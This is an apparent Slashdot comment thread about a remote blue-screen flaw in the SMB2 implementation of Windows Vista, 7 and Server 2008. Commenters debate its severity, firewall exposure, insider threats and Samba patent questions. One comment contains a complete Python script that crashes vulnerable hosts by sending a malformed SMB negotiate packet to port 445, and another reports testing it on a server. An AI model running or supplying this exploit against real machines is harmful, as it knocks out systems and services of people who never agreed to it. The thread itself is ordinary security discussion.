Windows 7 Reintroduces Remote BSoD

David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."

Re:Pretty nice

[David Gerard]

This is in the RTM gold master.

Correction!

[David Gerard]

I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.

And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.

Re:Correction!

[Anonymous Coward]

And not exploitable out of the box since SMB and SMBv2 are both firewalled. Yes, if you turn on homegroup, you are opening SMBv2 through the firewall, but only for the private network - so the exploit would need to be coming from another machine at your house. All in all, a nasty issue but won't really affect that many people.

For all who want a more technical summary of TFA:

[Seth Kriticos]

Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008

The exploit (which is actually ridiculously simple) goes as follows:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Current problem solution: disable the SMB protocol on your infrastructure..

Now please excuse me, I have go and play a bit with our network admin.. /joke

Re:IP Reasons for SMB2

[AndrewNeo]

No, it won't. The specs are right here [microsoft.com].

Re:Local?

[jim_v2000]

Pft...it'll be patched whenever the next update cycle is and will be irrelevant. Yeah, it's bad, but it will be short lived.

Re:IP Reasons for SMB2

[leromarinvit]

Probably not technical problems, but maybe legal ones. See that paragraph about patents? Neither the Open Specification Promis nor the Community Promise (both linked) cover SMB2.

Re:IP Reasons for SMB2

[eldavojohn]

No, it won't. The specs are right here [microsoft.com].

"No, it won't" what? Possibly spell problems for the Samba team? From your link:

Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com]) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com]). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...

Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?

Why do they use the ambiguous language quoted above if this is an open technology I'm not suppose to fear implementing? I mean, haven't we been threatened over this sort of thing before [slashdot.org]? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock in?) but I'm not about to give them the benefit of the doubt.

Re:Woo!

[Sethb]

I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.

Re:Not consistent

[Lulfas]

It's because SMB and SMBv2 are firewalled straight out of the box. You have to turn on homegroup and then attempt to exploit. Not quite the "OMG SKY IS FALLING" that the summary leads us to believe.

Re:Please grow up, you're driving us away

[Anonymous Coward]

Yes, use Windows because none of that ever happens. [electronista.com]

Great strawman argument, btw. We should ignore vulnerabilities in microsoft software because some precious flowers don't want their sensibilities offended.

Re:Please grow up, you're driving us away

[Krneki]

Trolls are OS independent. :)

Re:Please grow up, you're driving us away

[Anonymous Coward]

Dear User. It's a shame you cannot join linux community. We will be missing you and your valuable posts including:

1) Your thoughts on what should be fixed in 'linux'

2) Numerous (yet not very useful) descriptions of problems you encountered with 'linux' and demands to fix them

3) Comparing 'linux' to windows every time a new ubuntu or windows release is out

4) Screenshots of your desktop & stories about your friends seeing you use 'linux'

Re:Local?

[afidel]

What about the employee who just got fired who sets off an IP walk that crashes every file server? What about the employee that gets the malware of the day and it includes the ability for the 0wner to launch this attack inside your LAN? There's a lot more potential for abuse than just the prankster on the helpdesk deciding he wants to create some havoc.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Local?

[bbernard]

"but generally speaking you're not expecting attacks from inside your LAN"

Right, because a virus on my local network would never take advantage of that.
Right, because more than 60% of data loss events are triggered by insiders.
Right, because you personally know and trust every user on your LAN.
Right, because nobody would connect an unapproved device, like their iPod, or personal PC, to the LAN.

If you're not expecting most of your attacks from inside your LAN then you're just fooling yourself.

Re:Local?

[damien_kane]

You know, some of us work at multi-national corporations/firms that have offices in other countries. Should someone had access to the network by some means, they could crash a company's machines from halfway around the world since they are all on the same LAN...

What did it cost you to run cables 50,000 miles between your offices, and how did you get over the latency? Further to that, isn't your IT/Info-Sec group afraid of someone putting a listener on those cables?
Any place I know of with remote/satellite offices (including my own) uses WAN or VPN, where (due to separate subnets and proper routing) one member-LAN can't take down the other member-LAN halfway across the world with a simple ping-flood, netbios, or SMB attack.
Most modern offices these days even go so far as having each floor, or even department, on different physical networks, separate from each other.

Re:I knew Windows 7 was too good to be true

[Abreu]

I'll bite.

Theologically speaking, it's not to avoid "Allah feeling threatened and insecure".

The rug maker is just insuring himself that he won't fall to pride and hubris.

Windows 2008 is very vulnerable.

[miffo.swe]

Me and my coworker tried this on an updated Windows 2008 today and none of us could believe what happened. The server just dies mid-air and throws a proud BSOD.

Am i the only one surprised something like this could slip through all the supposed testing done by Microsoft? Have they even ran a fuzzer against their code at all? If blatantly obvious holes like this goes unseen in the new TCP/IP SMB2 code rest assured a whole slew of new holes will be found later.

Funniest thing is that this dont affects XP while Microsoft touts Windows 7/2008 as the safest os ever. I guess its all marketing and just blatantly nothing done about security other than to blame everything on the user by passing every security decission onto the user with UAC.

Re:Local?

[Midnight Thunder]

If it works with IPv6 then a malicious site can have IPv6 address. When the user visits the site the code reads the source IP and implements the attack.

This is why in a properly configured network you can limit SMB to within your network, by use of a firewall. With IPv6 a firewall is pretty much mandatory. If you need to file share outside your network, then using something like webdav in HTTPS mode is probably better, since this helps make it clear that you are not within your network.

Actually thinking about it, it would be cool if there was a way to change the icon of the server to indicate that it is outside your network (based on the subnet mask or something of the sorts).

Idiot

[omb]

Of course it is _VERY_SERIOUS_, un-priviliged user-land electively crashes kernel of every machine it can route TCP packets to, WTF are you stupid or something?

Re:Local?

[RiotingPacifist]

I can see it being used multiple times to dereference multiple kernel pointers, but i can't see how you would get it execute code. I suppose its a question of how much damage you can do dereferencing stuff inside the kernel vs how much protection the NT has against this stuff.
On linux a few well placed dereferences and you could probably disable the firewall then run anything in effective root (by removing all security checks), ofc to do damage you would still need a second exploit on an already running process (including those that were protected) to make use of this.

Anonymous Coward is a Twitter SockPuppet

[WillHill]

What's wrong Twitter? All of your accounts in karma hell? BTW, your suicide comment you made only shows your stupidity.

Re:Please grow up, you're driving us away

[ajlisows]

I cannot join in with the Linux community because of you people. You're just *too awful*.Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.

I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

I do agree with a lot of things that you said, except for the main point. If you are truly the mature adult here you should be able to use the best tool for the job even if others who use it act like complete idiots. Most of the people you speak of aren't the ones doing hard core Linux development. There are some very brilliant, mature, and overall decent individuals in the Open Source Community. Heck if you really want to help, bring your Software Engineering skills and your open mindedness to the community. You'll help it grow in two ways!